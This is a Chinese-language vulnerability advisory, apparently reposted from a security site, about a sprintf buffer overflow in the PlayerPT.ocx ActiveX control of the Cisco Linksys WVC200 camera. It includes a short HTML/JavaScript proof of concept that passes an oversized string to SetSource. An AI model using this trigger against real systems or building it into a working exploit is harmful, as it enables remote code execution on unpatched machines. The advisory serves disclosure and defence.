G PTZ Internet Video Camera WVC200 'PlayerPT.ocx'缓冲区溢出

发布日期:2012-03-22
更新日期:2012-03-23

受影响系统:
Cisco Wireless-G PTZ Internet Video Camera WVC200 1.0.0.15
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52673

Cisco Wireless-G PTZ Internet Video Camera WVC200 是一款网络摄像机。

Cisco Linksys WVC200 Wireless-G PTZ网络摄像机PlayerPT ActiveX控件PlayerPT.ocx在实现上存在sprintf缓冲区溢出漏洞,成功利用后可允许远程任意代码执行。

<*来源:rgod (rgod@autistici.org)
 
  链接:?l=bugtraq&m=133244206321890&w=2
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

rgod (rgod@autistici.org)提供了如下测试方法:

<HTML> <object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' /> </object> <script> var x=""; for (i=0; i<13999; i++){ x = x + "aaaa"; } obj.SetSource("","","","",x); </script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwgjdj.html